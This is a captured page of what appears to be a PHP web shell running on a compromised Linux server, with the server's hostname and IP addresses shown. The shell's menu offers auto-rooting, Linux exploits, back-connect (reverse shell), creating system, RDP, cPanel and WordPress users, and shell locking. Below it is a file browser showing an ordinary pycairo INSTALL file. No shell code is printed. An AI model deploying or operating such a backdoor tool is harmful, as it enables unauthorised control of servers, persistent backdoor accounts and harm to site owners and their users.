Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
pycairo-1.8.10 /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
AUTHORS
178
B
-rw-r--r--
COPYING
621
B
-rw-r--r--
COPYING-LGPL-2.1
25.91
KB
-rw-r--r--
COPYING-MPL-1.1
25.15
KB
-rw-r--r--
INSTALL
945
B
-rw-r--r--
NEWS
13.82
KB
-rw-r--r--
README
3.09
KB
-rw-r--r--
faq.rst
1.35
KB
-rw-r--r--
overview.rst
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : INSTALL
Install Procedure ----------------- Waf --- $ ./waf --help # shows available waf options $ ./waf configure # use '--prefix=PREFIX' if needed $ ./waf build $ ./waf install Unsupported alternative install methods --------------------------------------- GNU Autotools ------------- Using the same install method of install as cairo - GNU autotools. $ python -c "import sys; print sys.prefix" # make a note of the python prefix $ ./configure --prefix=<python_prefix> $ make $ make install # may require superuser access To build from git, use this line instead of the configure line above: $ ./autogen.sh --prefix=<python_prefix> If you're installing to another prefix than the one where Python is installed Python will not be able to find the cairo module until you add $prefix/lib/pythonX.Y/site-packages to the PYTHONPATH variable. Python distutils ---------------- $ python setup.py install Testing ------- See test/README
Close